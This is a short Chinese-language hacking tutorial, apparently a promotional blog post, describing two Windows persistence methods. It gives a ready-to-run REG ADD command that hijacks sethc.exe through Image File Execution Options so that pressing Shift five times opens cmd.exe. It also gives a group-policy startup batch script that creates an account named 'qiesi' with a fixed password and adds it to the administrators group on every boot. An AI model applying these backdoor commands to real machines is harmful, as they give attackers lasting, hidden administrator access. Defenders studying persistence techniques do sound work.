Windows常见的几种权限维持

零基础学黑客，搜索公众号：白帽子左一

1.映像劫持技术

简介
“映像劫持”，也被称为“IFEO”（Image File Execution Options），在WindowsNT架构的系统里，IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。

当一个可执行程序位于IFEO的控制中时，它的内存分配则根据该程序的参数来设定，而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据，最终得以设定一个程序的堆管理机制和一些辅助机制等。

出于简化原因，IFEO使用忽略路径的方式来匹配它所要控制的程序文件名，所以程序无论放在哪个路径，只要名字没有变化，它就运行出问题。

简单点说，当你打开的是程序A，而运行的却是程序B。

复现
执行命令，将cmd.exe程序劫持粘滞键。

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

连续按5次shift键之后，目标系统弹出cmd.exe，并不是之前的粘滞键界面

图片

2.策略组脚本维持

简介
Windows操作系统的组策略是配置计算机中某一些用户组策略的程序，由系统管理员操作控制计算机程序、访问网络资源、操作行为、各种软件设置的最主要工具。

复现
第一步：准备一个bat脚本，内容为：net user qiesi abc123… /add & net localgroup administrators qiesi /add ；

并将脚本放到C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup中

第二步：【gpedit.msc】打开组策略，在 【windows 设置】-> 【脚本(启动/关机】-> 启动 -> 添加1.bat。

这样的话，每一次启动都会创建一个qiesi账户。

第三步：重启服务器